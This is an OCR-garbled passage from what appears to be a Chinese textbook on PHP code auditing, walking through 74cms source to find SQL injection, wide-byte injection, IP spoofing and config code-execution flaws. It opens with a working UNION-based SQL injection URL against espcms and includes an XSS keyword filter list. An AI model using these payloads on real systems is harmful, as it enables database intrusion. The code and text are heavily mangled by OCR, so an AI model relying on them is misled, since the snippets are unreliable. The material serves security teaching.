= $ SQL- XSS- Encryption- Encoding- Other- 


ium LoadURL  |http;//127.0.0.1/espcms/adminsoft/index.php?archive-citylist&action-citylist&parentid--1 union select 1,2,user(),4,5 
Split URL 


I Execute 


Enable Post data | | Enable Referrer 


root@localhost 





A 3-6 
这 个 案例 非常 真实 地 演示 了 如 何 根据 天 键 字 回溯 变量 来 进行 代码 审计 。 
3.2 ”通读 全 文 代码 
前 面 提 到 的 根据 敏感 关键 字 来 回溯 传 入 的 参数 ， 是 一 种 逆向 追踪 的 思路 ， 我 们 也 提 到 了 这 种 方式 的 优 缺 点 ， 实 际 上 在 需要 快速 寻找 漏洞 的 情况 下 用 回溯 参数 的 方式 是 非常 有 效 的 ， 但 这 种 方式 并 不 适合 


运用 在 企业 中 做 安全 运营 时 的 场景 ， 在 企业 中 做 自身 产品 的 代码 审计 时 ， 我 们 需要 了 解 整个 应 用 的 业务 逻辑 ， 才 能 挖掘 到 更 多 更 有 价值 的 漏洞 。 


通读 全 文 代码 也 有 一 定 的 技巧 ， 并 不 是 随便 找 文件 逐个 读 完 就 可 以 了 ， 这 样 你 是 很 难 真 正 读 懂 这 套 Web 程 序 的 ， 也 很 难 理解 代码 的 业务 多 辑 ， 首 先 我 们 要 看 程序 的 大 体 代码 结构 ， 如 主 目录 有 哪些 文 
件 ， 模 块 目录 有 哪些 文件 ， 插 件 目录 有 哪些 文件 ， 除 了 关注 有 哪些 文件 ， 还 要 注意 文件 的 大 小 、 创 建 时 间 。 我 们 根据 这 些 文件 的 命名 就 可 以 大 致知 道 这 个 程序 实现 了 哪些 功能 ,核心 文件 是 哪些 ，discuz 的 


程序 主 目录 如 图 3-7 所 示 。 
EFF 
Ab api 


在 看 程序 目录 结构 的 时 候 ， 我 们 要 特别 注意 以 下 几 个 文件 : 


修改 日 期 


2014-09-23 14:21 


图 3-7 


大 小 





d archiver 2014-09-23 14:21 
bb config 2014-09-23 14:21 
di data 2014-09-23 14:21 
JJ install 2014-09-23 14:21 

| static 2014-09-23 14:21 Xf} 
Js template 2014-09-23 14:21 Mie 
d uc. client 2014-09-23 14:21 ”文件 支 
Jy uc server 2014-09-23 14:21 xk 
i| admin.php 2013-02-0116:14 PHP 文件 3 KB 
I| api.php 2013-02-01 16:14 PHP 文件 1 KB 
I| connect.php 2013-02-0116:14 PHP 文件 1 KB 
| cp.php 2013-02-0116:14 PHP 文件 1 KB 
e) crossdomain.xml 2013-02-01 16:14 HTML X 1 KB 
7? favicon.ico 2013-02-01 16:14 Kankan ICO 图 像 6 KB 
Ey forum.php 2013-02-01 16:14 PHP 3744 3 KB 
iz] group.php 2013-02-01 16:14 PHP we 1 KB 
E) home.php 2013-02-01 16:14 PHP 文件 2 KB 
i| index.php 2013-02-01 16:14 PHP 文件 6 KB 
|) member.php 2013-02-01 16:14 PHP 文件 2 KB 
| misc.php 2013-02-0116:14 PHP 文件 2 KB 
E) plugin.php 2013-02-01 16:14 PHP 文件 2 KB 
&| portal.php 2013-02-01 16:14 PHP 文件 1 KB 
国 robots.txt 2013-02-0116:14  TXT 文件 1 KB 
iz] search.php 2013-02-01 16:14 PHP wit 2 KB 
a’) userapp.php 2013-02-01 16:14 PHP 文件 2 KB 


1) 函数 集 文件 ， 通 常 命名 中 包含 functions 或 者 common 等 关键 字 ， 这 些 文 件 里 面 是 一 些 公共 的 函数 ， 提 供给 其 他 文件 统一 调用 ， 所 以 大 多 数 文件 都 会 在 文件 头 部 包含 到 其 他 文件 。 寻 找 这 些 文件 一 个 
非常 好 用 的 技巧 就 是 去 打开 index.php 或 者 一 些 功能 性 文件 ， 在 头 部 一 般 都 能 找到 。 


2) 配置 文件 ， 通 常 命 名 中 包括 config 关 键 字 ， 配 置 文件 包括 Web 程 序 运 行 必须 的 功能 性 配置 选项 以 及 数据 库 等 配置 信息 。 从 这 个 文件 中 可 以 了 解 程序 的 小 部 分 功能 ， 另 外 看 这 个 文件 的 时 候 注 意 观 察 
配置 文件 中 参数 值 是 用 单 引 号 还 是 用 双 引 号 括 起 来 ， 如 果 是 双 引 号 ， 则 很 可 能 会 存在 代码 执行 漏洞 ， 例 如 下 面 Kuwebs 的 代码 ， 只 要 我 们 在 修改 配置 的 时 候 利用 PHP 可 变 变量 的 特性 即 可 执行 代码 。 





p! 天 让 基本 信息 配置 / 
uWebsiteURL = 
uWebsiteSupportEn 
uWebsiteSupportSimpli Soyo tional] = E 
uoce c niae = "en" 
uWebsiteUploadFileMax 
uWebsiteAllowUploadFil 
* 邮 件 设置 * 
uWebsiteMailType LS 
uWebsiteMailSmtpHost = "smtp.qq.com"; 


"http: m kuwebs . com" 


























= "2" 
eFormat DE E T 





— 

















DOWD 
ya AAA AAA 


3) 安全 过 滤 文 件 ， 安 全 过 滤 文 件 对 我 们 做 代码 审计 至 关 重 要 ， 天 系 到 我 们 挖掘 到 的 可 疑点 能 不 能 利用 ， 通 常 命名 中 有 filter、safe、check 等 关键 字 ， 
对 SQL 注入 和 XSs 过 滤 ， 还 有 文件 路 径 、 


这 类 文件 主要 是 对 参数 进行 过 滤 ， 比 较 常 见 的 是 针 
执行 的 系统 命令 的 参数 ， 其 他 的 则 相对 少见 。 而 目前 大 多 数 应 用 都 会 在 程序 的 入 口 循环 对 所 有 参数 使 用 addslashes () 函数 进行 过 滤 。 











wa 
AM AA 


private static function do query saf 
$sql = str replace (array (' AN, 
$mark = $clean = '' 

if (strpos ($sql, ') == false e J a 

$clean = preg replace ("/' (.+? ) '/s' $sq 

} else { 


EAGEN LA) ， 
up = 
) . 


**. $sql) j 











false && strpos ($sql, ar) === 





'_-') === false && strpos ($sql, '@') === false && strpos ($sql, false) 





4) index 文 件 ，index 是 一 个 程序 的 入 口 文件 ， 所 以 通常 我 们 只 要 读 一 遍 index 文 件 就 可 以 大 致 了 解 整个 程序 的 架构 、 运 行 的 流程 、 包 含 到 的 文件 ， 其 中 核心 的 文件 又 有 哪些 。 而 不 同 目 录 的 index 文 件 
也 有 不 同 的 实现 方式 ， 建 议 最 好 先 将 几 个 核心 目录 的 index 文 件 都 简单 读 一 遍 。 


上 面 介 绍 了 我 们 应 该 注意 的 部 分 文件 ， 可 以 帮助 我 们 更 有 方向 地 去 读 全 部 的 代码 ， 实 际 上 在 我 们 真正 做 代码 审计 的 时 候 ， 经 常会 遇 到 各 种 框架 ， 这 时 候 就 会 被 搞 得 星 头 转向 ， 所 以 在 学 习 代 码 审计 的 前 
期 建议 不 要 去 读 开源 框架 或 者 使 用 开源 框架 的 应 用 ， 先 去 chinaz、admin5 之 类 的 源码 下 载 网 站 下 载 一 些小 应 用 来 读 ， 并 且 一 定 要 多 找 几 套 程序 通读 全 文 代 码 ， 这 样 我 们 才能 总 结 经 验 ， 等 总 结 了 一 定 的 经 
验 ， 对 PHP 也 比较 熟悉 的 时 候 ， 再 去 读 一 些 像 thinkphp、Yii、Zend Framework 等 开源 框架 ， 才 能 快速 地 挖掘 高 质量 的 漏洞 。 


通读 全 文 代码 的 好 处 显而易见 ， 可 以 更 好 地 了 解 程序 的 架构 以 及 业务 逻辑 ， 能 够 挖掘 到 更 多 、 更 高 质量 的 逻辑 漏洞 ， 一 般 老 手 会 比较 喜欢 这 种 方式 。 而 缺点 就 是 花费 的 时 间 比 较 多 ， 如 果 程序 比较 大 ， 
读 起 来 也 会 比较 累 。 


骑士 cms 通 读 审计 案例 

我 们 已 经 介绍 了 代码 审计 中 通读 全 文 代码 审计 方式 的 思路 ， 下 面 我 们 用 案例 来 说 明 这 种 通读 方式 。 

为 了 方便 大 家 理解 ， 笔 者 找 了 一 款 相 对 简单 容易 看 懂 的 应 用 骑士 cms 来 介绍 ， 版 本 是 3.5.1， 具 体 的 审计 思路 我 们 在 上 文中 已 经 有 过 介绍 。 
3.2.1.1 查看 应 用 文件 结构 


首先 来 看 一 下 骑士 cms 的 大 致 文件 目录 结构 ， 如 图 3-8 所 示 。 


#2="74cms" P 


/ 


} 


d N ! / 
Bi ik i 


admin agreement baiduxml company hrtools include 


W. Ry 
-- | j = 1/ 


| 


kb Aj 
3 aT 
fe J 


install Jobs link mobile 


| j 


r '] 
f 3 / ri : 
Y T Jj i i ms 
i i & | ^. 


simple suggest temp templates We favicon.ico | index.php robots.txt 





图 3-8 


首先 需要 看 看 有 哪些 文件 和 文件 夹 ， 寻 找 名 称 里 有 没有 带 有 api、admin、manage、include 一 类 关键 字 的 文件 和 文件 夹 ， 通 常 这 些 文 件 比较 重要 ， 在 这 个 程序 里 ， 可 以 看 到 并 没有 什么 PHP 文 件 ， 就 
一 个 index.phPp， 看 到 有 一 个 名 为 include 的 文件 夹 ， 一 般 比 较 核心 的 文件 都 会 放 在 这 个 文件 夹 中 ， 我 们 先 来 看 看 大 概 有 哪些 文件 ， 如 图 3-9 所 示 。 


上 电脑 » 本 地 磁盘 (D) > www > 74cms > include > v & iSgx'inc 

名 称 修改 日 其 aem 大 小 

E crons 2014/12/30 20:18 ”文件 去 

| | encoding 2014/12/30 20:18 文件 去 

| | payment 2014/12/30 20:18 ”文件 去 

| | template lite 2014/12/30 20:18 “ie. 

lad 74cms version.php 2014/11/28 14:06 PHP 文件 1 KB 
[Af baiduxml.class.php 2012/8/20 17:52 PHP 文件 3 KB 
[af common.fun.php 2014/11/27 17:01 — PHP 文件 36 KB 
la. common.inc.php 2014/9/2 15:38 PHP 文件 3 KB 
cut upload.php 2014/8/30 18:28 PHP 文件 6 KB 
laf fun company.php 2014/11/11 18:24 PHP 文件 51 KB 
fun personal.php 2014/11/11 18:24 PHP 文件 27 KB 
luf fun user.php 2014/9/12 19:07 PHP 文件 12 KB 
li fun wap.php 2014/11/24 19:07 PHP 文件 14 KB 
gdbmp.php 2010/4/8 11:41 PHP 文件 11 KB 
lid imagecaptcha.php 2014/8/8 14:43 PHP 文件 9 KB 
la imageresize.class.php 2013/4/7 19:39 PHP 文件 4 KB 
lad mysql.class.php 2014/10/31 10:07 PHP 文件 4 KB 
laf page.class.php 2014/9/2 16:32 PHP xA 9 KB 
[ad plus.common.inc.php 2014/8/8 16:49 PHP 女 件 2 KB 
[ad splitword.class.php 2012/6/7 9:50 PHP 文件 3 KB 
ja tplinc.php 2014/4/29 19:13 PHP 文件 2 KB 
iui upload.php 2014/8/30 18:29 PHP 文件 6 KB 
ud watermark.php 2014/8/19 21:25 PHP 文件 4 KB 
lad word.txt 2012/4/4 14:33 TXT 文件 544 KB 

a 3 
3.2.1.2 ”查看 关键 文件 代码 


在 这 个 文件 夹 里 面 我 们 看 到 了 多 个 数 十 K 的 PHP 文 件 ， 比 如 common.fun.php 就 是 本 程序 的 核心 文件 ， 基 础 浮 数 基本 在 这 个 文件 中 实现 ， 我 们 来 看 看 这 个 文件 里 有 哪些 关键 函数 ， 一 打开 这 个 文件 ， 立 


马 就 看 到 一 大 堆 过滤 函 数 ， 这 是 我 们 最 应 该 关心 的 地 方 ， 首 先是 一 个 SQL 注入 过 滤 函 数 : 











function addslashes deep ($value) 
{ 


} 





if (empty (Svalue) ) 
return Svalue; 


else 
{ 





if (! get magic quotes gpc () ) 
{ 


Svalue=is array ($value) ? array map ('addslashes deep', 


else 


Svalue=is array ($value) ? array map ('addslashes deep', 
} 


return Svalue; 


} 


Svalue) : 


Svalue) : 


mystrip tags ($value) ; 


mystrip tags (addslashes ($value) ) ; 


该 函数 将 传 入 的 变量 使 用 addslashes () 函数 进行 过 滤 ， 也 就 过 滤 掉 了 单 引 号 、 双 引号 、NULL 字 符 以 及 斜 枉 ， 现 在 我 们 要 记 住 ， 在 挖掘 SQL 注入 等 漏洞 时 ， 只 要 参数 在 拼接 到 SQL 语句 前 ， 除 非 有 宽 字 
节 注 入 或 者 其 他 特殊 情况 ， 否 则 使 用 了 这 个 函数 就 不 能 注入 了 。 


再 往 下 走 是 一 个 XSS 过 滤 的 函数 mystrip_ tags () ， 代 码 如 下 : 


function mystrip tags ($string) 
{ 


$string = new html special chars ($string) ; 
$string = remove xss ($string 
return $string; 


) 





这 个 函数 调用 了 new_html| special chars () 和 remove xss () 

















function new html special chars ($string) { 


国 数 来 过 滤 XSS， 就 在 该 函数 下 方 ， 代 码 如 下 : 
































































































































































































































$string = str replace (array ('&amp; ', '&quot; ', '&lt; ', '&gt; ') , array ('&', "'"', '«', >!) , $string) ; 
$string = strip tags ($string) ; 
return $string; 
} 
function remove xss ($string) { 
$string = preg replace ('/[\x00-\x08\x0B\x0C\x0E-\xlF\x7F]+/S', '', $string) ; 
Sparml = Array ('javascript', 'union', 'vbscript', ''expression', ‘applet’, 'xml', ''blink', 'link', 'script', 'embed', ‘object’, 'iframe', ‘frame’, 'frameset', ‘ile 
Sparm2 = Array ('onabort', 'onactivate',  'onafterprint',  'onafterupdate',  'onbeforeactivate',  'onbeforecopy', 'onbeforecut',  'onbeforedeactivate',  'onbeforeeditfocus' 
Sparm3= Array ('alert', 'sleep', 'load file', 'confirm', 'prompt', 'bench-mark', 'select', 'update', 'insert', 'delete', 'alter', 'drop', 'truncate', 'script', 'eval') ; 
Sparm = array merge (Sparml, Sparm2, Sparm3) ; 
for ($i = 0; Si < sizeof ($parm) ; $i++) { 
Spattern = '/'; 
for ($j = 0; $j < strlen ($parm[$i]) ; $j++) { 
if ($j > 0) 4 
$pattern .= ' ('; 
$pattern .= ' (&#[x|X]0 ([9] [a] [b]) ; ? ) ? '; 
$pattern .= '| (&#0 ([9][10][13]) ; ?) ? '; 
$pattern .= !')? '; 
} 
$pattern .= Sparm[$i] [$j]; 
} 
Spattern .= '/i'; 
$string = preg replace ($pattern, '****', $string) ; 
} 
return Sstring; 
} 
fEnew_html_special_chars () 函数 中 可 以 看 到 ， 这 个 函数 对 & 符 号 、 双 引号 以 及 尖 括 号 进行 了 html 实 体 编码 ， 并 且 使 用 strip_tags () 函数 进行 了 二 次 过 滤 。 而 remove_xss () 函数 则 是 对 一 些 标签 
关键 字 、 事 件 关键 字 以 及 敏感 图 数 关键 字 进 行 了 蔡 换 。 
再 往 下 走 有 一 个 获取 IP 地 址 的 函数 getip () ， 是 可 以 伪造 |P 地 址 的 : 
function getip () 
{ 
if (getenv ('HTTP CLIENT IP') and strcasecmp (getenv ('HTTP CLIENT IP') , 'unknown') ) { 
Sonlineip=getenv ('HTTP CLIENT IP') ; 
Jelseif (getenv ('HTTP X FORWARDED FOR') and strcasecmp (getenv ('HTTP X FORWARDED FOR') , 'unknown') ) { 
Sonlineip=getenv ('HTTP X FORWARDED FOR') ; 
)elseif (getenv ('REMOTE ADDR') and strcasecmp (getenv ('REMOTE ADDR') , 'unknown') ) ( 
Sonlineip=getenv ('REMOTE ADDR') ; 
Jelseif (isset ($ SERVER['REMOTE ADDR']) and $ SERVER['REMOTE ADDR'] and strcasecmp ($ SERVER['REMOTE ADDR'], 'unknown') ) { 
Sonlineip=$ SERVER['REMOTE ADDR']; 

















} 
preg match ("/\d{1, 3}\.\d{1, 3}\.\d{1, 31 X. Nat, 3}/", 
return Sonlineip = $match[0] ? $match[0] : 'unknown'; 





$onlineip, $match) ; 











多 应 用 都 会 由 于 在 获取 IP 时 没有 验证 IP 格 式 ， 而 存在 注入 漏洞 ， 不 过 这 里 还 只 是 可 以 伪造 




















表 往 下 看 可 以 看 到 一 个 值得 关注 的 地 方 ，SQL 查 询 统 一 操作 水 数 inserttable () 以 及 updatetable () 函数 ， 大 多 数 SQL 语 句 执行 都 会 经 过 这 里 ， 所 以 我 们 要 关注 这 个 地 方 是 否 还 有 过 滤 等 问题 。 
function inserttable ($tablename, $insertsqlarr, $returnid=0, $replace = false, $silent=0) 
(global $db; Sinsertkeysql = Sinsertvaluesql = $comma = ''; foreach (Sinsertsqlarr as Sinsert key => $insert value) {S$insertkeysql .= $comma.'*'.Sinsert key.'*'; Sinsertvalues 


} 


再 往 下 走 则 是 wheresql () 函数 ， 是 SQL 语句 查询 的 Where 条 件 拼接 的 地 方 ， 我 们 可 以 看 到 参数 都 使 用 了 单 引号 进 


TAR, (ASMP: 








function wheresql ($wherearr='') 


{ 





Swheresql=""; 

if (is array (Swherearr) ) 
{ 
Swhere set-' WHERE '; 

foreach (Swherearr as $key => $value) 

{ 

Swheresql .=Swhere set. Scomma.$key.'="'.Svalue.'"'; 
Scomma = ' AND '; 

$where set-' '; 


} 




















} 


return Swheresql; 


还 有 一 个 访问 令 牌 生成 的 溺 数 asyn_userkey () ， 拼 接 用 户 名 、 密 码 salt 以 及 密码 进行 一 次 md5， 访 问 的 时 候 只 要 在 GET 参 数 key 的 值 里 面 加 上 生成 的 这 个 key 即 可 验证 是 否 有 权限 ， 被 用 在 注册 、 找 回 
密码 等 验证 过 程 中 ， 也 就 是 我 们 能 看 到 的 找 回 密码 链接 里 面 的 Key， 代 码 如 下 : 








function asyn userkey (Suid) 


Aa 


global $db; 
$sql - "select 
Suser-$db-»ge! 











tone (Ssql) ; 


from ".table ('members') . 


" where uid = '".intval (Suid) 





QUT L 





M 








T Xu: 


return md5 ($user[' username'].Suser['pwd hash'].Suser['password']) ; 





同 目录 下 的 文件 如 图 3-10 所 示 。 


2014/11/11 18:24 
2014/11/11 18:24 
2014/9/12 19:07 

2014/11/24 19:07 


fun company.php 
fun personal.php 


fun user.php 
fun wap.php 





图 3-10 


图 中 是 具体 功能 的 实现 代码 ， 我 们 这 时 候 还 不 需要 看 ， 先 了 解 下 程序 的 其 他 结构 。 


3.2.1.3 ”查看 配置 文件 


接 下 来 我 们 找 找 配 置 文件 ， 上 面 我 们 介绍 到 配置 文件 的 文件 名 通常 都 带 有 “config” 这 样 的 关键 字 ， 我 们 只 要 搜索 带 有 这 个 关键 字 的 文件 名 即 可 ， 如 图 3-11 所 示 。 


在 搜索 结果 中 我 们 可 以 看 到 搜索 出 来 多 个 文件 ， 结 合 文 件 所 在 目录 这 个 经 验 可 以 判断 出 data 目 录 下 面 的 config.php 以 及 cache_config.php 才 是 真正 的 配置 文件 ， 打 开 /data/config.php 查 看 代码 ， 如 
下 所 示 : 








“74cms" 中 的 搜索 结果 vO config 
c 1 set admin set config nav htm.php 修改 日 期 : 2014/12/30 20:39 
+ E D:\www\74cms\temp\templates c ERI. PHP 文件 Av): 565 Zp 
* c 1 set admin set config htm.php 修改 日 期 : 2014/12/30 20:39 
+ DAwww/4cmsMXempMemplates c 类 型 : PHP 文件 大 小 : 6.20 KB 
w cache sms config.php 修改 日 期 : 2014/12/30 20:20 
D:\www\74cms\data 类 型 : PHP 文件 太 小 : 549 F5 
cache config.php 修改 日 期 : 2014/12/30 20:20 
EU Diwwwi7A4cmsXdata 3572). PHP 文件 大 小 : 3.65 KB 
config.php 修改 日 期 : 2014/12/30 20:20 
| D:\www\74cms\data 388. PHP 文件 大 小 : 276 字 节 
e admin set config.htm D:\www\74cems\ad... 大 小 : 4.93 KB 
修改 日 期 : 2014/8/26 10:58 
人 admin set config nav.htm DAwww\74cms\ad... 大 小 : 322 字 节 
修改 日 期 : 2011/10/18 1:27 
n compile.compile config.php 修改 日 期 : 2006/12/14 19:00 
Dwww\74cms\include\template lite\internal EH. PHP 文件 X] 1.75 KB 
class.config.php 修改 日 期 : 2006/4/28 21:22 
D:\www\74cms\include\template lite 类 型 ; PHP 文件 大 小 : 4.39 KB 
template.config loader.php 修改 日 期 : 2006/4/28 21:12 
D:\www\74cms\include\template lite\internal 类 型 : PHP 文件 žule 2.20 KB 
E 341 
ronis: = "localhost"; 
Sdoname = "74cms"; 
Sdouser = "root"; 
$dbpass = "123456"; 
vpre = "ge " 
$QS cookiedomain = ''; 
$QS cookiepath = "/74cms/"; 


SQS pwdhash = "KOciF: RkE4xNhu@s"; 
define ('OISHI CHARSET', 'gb2312') ; 
define ('OISHI DBCHARSET', 'GBK') ; ? > 


























很 明显 看 到 ， 很 有 可 能 存在 我 们 之 前 说 过 的 双 引 号 解析 代码 执行 的 问题 ， 通 常 这 个 配置 是 在 安装 系统 的 时 候 设 置 的 ， 或 者 后 台 也 有 设置 的 地 方 。 另 外 我 们 还 应 该 记 住 的 一 个 点 是 QlSHI_DBCHARSET 常 
量 ， 这 里 配置 的 数据 库 编 码 是 GBK， 也 就 可 能 存在 宽 字 节 注入 ， 不 过 需要 看 数据 库 连接 时 设置 的 编码 ， 不 妨 找 找 看 ， 找 到 骑士 cms 连 接 MySQL 的 代码 在 include\mysql.class.php 文 件 的 connect () 函数 ， 
代码 如 下 : 








function connect ($dbhost, Sdbuser, S$dbpw, $dbname = '', S$dbcharset = 'gbk', Sconnect=1) { 
$func = empty ($connect) ?  'mysql pconnect' :  'mysql connect'; 
if (! $this->linkid = @Sfunc ($dbhost, Sdbuser, Sdbpw, true) ) { 
Sthis-»dbshow ('Can not connect to Mysql! ') ; 
} else 
if (Sthis-»dbversion () > '4.1') { 
mysql_query ( "SET NAMES gbk") ; 
if ($this- ->dbversion () > '5.0.1') { 
mysql query ("SET sql mode = ''", $this->linkid) ; 
mysql_query ("SET character set connection-".$dbcharset.", character set results-".$dbcharset.", character set client-binary", $this-> linkig) ; 
} 
} 


} 
if (Sdbname) { 
if (mysql select db (Sdbname, Sthis-»linkid) ===false) { 


























$this-»dbshow ("Can't select MySQL database ($dbname) ! ") ; 
} 
} 


这 段 代 码 里 面 有 个 关键 的 地 方 ， 见 加 粗 代码 ， 这 里 存在 安全 隐患。 


代码 首先 判断 MySQL 版 本 是 否 大 于 4.1， 如 果 是 则 执行 如 下 代码 : 


mysql query ( "SET NAMES gbk") ; 





执行 这 个 语句 之 后 再 判断 ， 如 果 大 于 5 则 执行 如 下 代码 : 


mysql query ("SET character set connection-".S$dbcharset.", 
haracter set results-".$dbcharset.", charact r set client-binary", 
S$this-»linkid) ; 

















也 就 是 说 在 MySQL 版 本 小 于 5 的 情况 下 是 不 会 执行 这 行 代码 的 ， 但 是 执行 了 “set names gbk" ， 我 们 在 之 前 介绍 过 “set names gbk" 其 实干 了 三 件 事 ， 等 同 于 : 








SET character set connection-' gbk’ , haracter set results= gok’ , 
character set client-' gbk' 




















因此 在 MySQL 版 本 大 于 4.1 小 于 5 的 情况 下 ， 基 本 所 有 跟 数据 库 有 关 的 操作 都 存在 宽 字 节 注入 。 


3.2.1.4 ” 跟 读 首页 文件 


通过 对 系统 文件 大 概 的 了 解 ， 我 们 对 这 套 程序 的 整体 架构 已 经 有 了 一 定 的 了 解 ， 但 是 还 不 够 ， 所 以 我 们 得 跟 读 一 下 index.php 文 件 ， 看 看 程序 运行 的 时 候 会 调用 哪些 文件 和 函数 。 


打开 首页 文件 index.php 可 以 看 到 如 下 代码 : 








if (! file exists (dirname ( FILE ) .'/data/install.lock') ) 
header ("Location: install/index. php") ; 

define ('IN OISHI', true) ; 

Salias-"QS index"; 

require once (dirname ( FILE ) .'/include/common.inc.php') ; 





















































首先 判断 安装 锁 文 件 是 否 存 在 ， 如 果 不 存在 则 跳 转 到 install/index.php， 接 下 来 是 包含 /include/common.inc.php 文 件 ， 跟 进 该 文件 查看 : 





require once (QISHI ROOT PATH.'data/config.php') ; 

header ("Content-Type: text/html; charset-".QISHI CHARSET) ; 
require once (QISHI ROOT PATH.'include/common.fun.php') ; 
require once (QISHI ROOT PATH.'include/74cms version.php') ; 


















































/include/common.inc.php 文 件 在 开头 包含 了 三 个 文件 ，datay/config.php 为 数据 库 配 置 文件 ，include/common.fun.php 文 件 为 基础 函数 库 文件 ，include/74cms version.php 为 应 用 版 本 文件 。 接 






































着 往 下 看 : 
if (! empty ($ GET) ) 
"m = addslashes deep ($ GET) ; 
? (! empty ($_POST) ) 
Set = addslashes deep ($ POST) ; 
weer | = addslashes deep ($ COOKIE) ; 
$ REQUEST = addslashes deep ($ REQUEST) ; 


ni 


- 

















这 段 代码 调用 了 include/common.fun.php 文 件 里 面 的 addslashes deep () 函数 对 GET/POSTMCOOKIE 参 数 进行 了 过 滤 ， 再 往 下 走 可 以 看 到 又 有 一 个 包含 文件 的 操作 : 














require once (QISHI ROOT PATH.'include/tpl.inc.php') ; 


包含 了 include/tpl.inc.php 文 件 ， 跟 进 看 看 这 个 文件 做 了 什么 : 




















include once (QISHI ROOT PATH.'include/template lite/class.template.php') ; 


$smarty = new Template Lite; 
$smarty -> cache dir = QISHI ROOT PATH.'temp/caches/'.$ CFG['template dir']; 


H 
$smarty -> compile dir = QISHI ROOT PATH.'temp/templates c/'.$ CFG [' template . dir']; 
Q 















































Ssmarty -> template dir = SH | ROOT | PATH.'templates/'.$ | CEG[' template : dir']; 









































Ssmarty -> reserved template varname = "smarty"; 
$smarty -» left delimiter - "(4"; 

$smarty -> right delimiter = "4j"; 

$smarty -> force compile = false; 

$smarty -» assign (' PLUG', $ PLUG) ; 

$smarty -> assign ('OISHI', $ CFG) ; 

















$smarty -> assign ('page select', $page select) ; 


首先 看 到 包含 了 include/template lite/class.template.php 文 件 ， 这 是 一 个 映射 程序 模板 的 类 ， 由 Paul Lockaby paul 和 Mark Dickenson 编 写 ， 由 于 该 文件 较 大 ， 我 们 这 里 不 再 仔细 分 析 ， 继 续 往 下 跟 
可 以 看 到 这 段 代码 实例 化 了 这 个 类 对 象 赋值 给 $smarty 变 量 ， 继 续 跟 进 则 回转 到 index.php 文 件 代 码 : 





if (! $smarty-»is cached ($mypage['tpl'], $cached id) ) 
{ 

require once (QISHI ROOT PATH.'include/mysql.class.php') ; 
$db = new mysql (Sdbhost, $dbuser, $dbpass, $dbname) ; 
unset (Sdbhost, $dbuser, $dbpass, $dbname) ; 
$smarty-»display (Smypage['tpl'], $cached id) ; 

} 

else 

{ 

$smarty-»display ($mypage['tpl'], $cached id) ; 

} 














判断 是 否 已 经 缓存 ， 然 后 调用 display () 函数 输出 页 面 ， 审 计 到 这 里 是 否 对 整个 程序 的 框架 比较 熟悉 了 ” 接 下 来 像 审计 index.php 文 件 一 样 跟 进 其 他 功能 入 口 文件 即 可 完成 代码 通读 。 


3.3 ”根据 功能 点 定向 审计 


在 有 了 一 定 的 代码 审计 经 验 之 后 ， 一 定 会 知道 哪些 功能 点 通常 会 有 哪些 漏洞 ， 在 我 们 想 要 快速 挖掘 漏洞 的 时 候 就 可 以 这 样 来 做 ， 首 先 安装 好 并 且 运 行程 序 ， 到 处 点 点 ， 浏 览 一 下 ， 看 下 程序 有 哪些 功 


能 ,这 些 功能 的 程序 文件 分 别 是 怎么 样 的， 是 独立 的 模块 还 是 以 插件 形式 存在 ,或 者 是 写 在 一 个 通用 类 里 面 ， 然 后 多 处 调用 。 在 了 解 这 些 功能 的 存在 形式 后 ， 可 以 先 寻 找 经 常会 出 问题 的 功能 点 ， 简 单 黑 盒 
测 斌 一下， 如果 没 有 发 现 很 普通 、 很 常见 的 漏洞 ， 再 去 读 这 个 功能 的 代码 ， 这 样 我 们 读 起 来 就 可 以 略 过 一 些 刚才 黑 盒 测试 过 的 点 ， 提 高 审计 速度 。 


根据 经 验 ， 我 们 来 简单 介绍 几 个 功能 点 经 常会 出 现 的 漏洞 ， 如 下 所 示 : 


1) 文件 上 传 功能 。 这 里 说 的 文件 上 传 在 很 多 功能 点 都 会 出 现 ， 比 如 像 文 章 编辑 、 资 料 编辑 、 头 像 上 传 、 附 件 上 传 ， 这 个 功能 最 常见 的 漏洞 就 是 任意 文件 上 传 了 ， 后 端 程序 没有 严格 地 限制 上 传 文件 的 格 


式 ， 导 致 可 以 直接 上 传 或 者 存在 绕 过 的 情况 ， 而 除了 文件 上 传 功能 外 ， 还 经 常 发 生 SQL 注 入 漏洞 。 因 为 一 般 程 序 员 都 不 会 注意 到 对 文件 名 进行 过 滤 ， 但 是 又 需要 把 文件 名 保存 到 数据 库 中 ， 所 以 就 会 存在 
SQL 注入 漏洞 。 


2) 文件 管理 功能 。 在 文件 管理 功能 中 ， 如 果 程 序 将 文件 名 或 者 文件 路 径直 接 在 参数 中 传递 ， 则 很 有 可 能 会 存在 任意 文件 操作 的 漏洞 ， 比 如 任意 文件 读 取 等 ， 利 用 的 方式 是 在 路 径 中 使 用 
http://www.hzcourse.com/resource/readBook?path=/openresources/teach_ebook/uncompressed/15497/OEBPS/Text/../av&http://www.hzcourse.com/resource/readBook? 


path=/openresources/teach_ebook/uncompressed/15497/OEBPS/Text/..\ Heb, Y0E3-12Aha. 


除了 任意 文件 操作 漏洞 以 外 ， 还 可 能 会 存在 XSS 漏 洞 ， 程 序 会 在 页 面 中 输出 文件 名 ， 而 通常 会 琉 忽 对 文件 名 进行 过 滤 ， 导 致 可 以 在 数据 库 中 存 入 带 有 类 括号 等 特殊 符号 的 文件 名 ， 最 后 显示 在 页 面 上 的 
时 候 就 会 被 执行 。 


3) 登录 认证 功能 。 登 录 认 证 功能 不 是 指 一 个 登录 过 程 ， 而 是 整个 操作 过 程 中 的 认证 ， 目 前 的 认证 方式 大 多 是 基于 Cookie 和 Session， 不 少 程序 会 把 当前 登录 的 用 户 账号 等 认证 信息 放 到 Cookie 中 ,或 
许 是 加 密 方式 ， 是 为 了 保持 用 户 可 以 长 时 间 登 录 ， 不 会 一 退出 浏览 器 或 者 Session 超时 就 退出 账户 ， 进 行 操 作 的 时 候 直接 从 Cookie 中 读 取出 当前 用 户 信息 ， 这 里 就 存在 一 个 算法 可 信 的 问题 ， 如 果 这 段 
Cookie 信 息 没有 加 salt 一 类 的 东西 ， 就 可 以 导致 任意 用 户 登 录 漏洞 ， 只 要 知道 用 户 的 部 分 信息 ， 即 可 生成 认证 令 牌 ， 甚 至 有 的 程序 会 直接 把 用 户 名 明文 放 到 Cookie 中 ， 操 作 的 时 候 直 接 取 这 个 用 户 名 的 数 
据 ， 这 也 是 常 说 的 越权 漏洞 。 
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图 3-12 
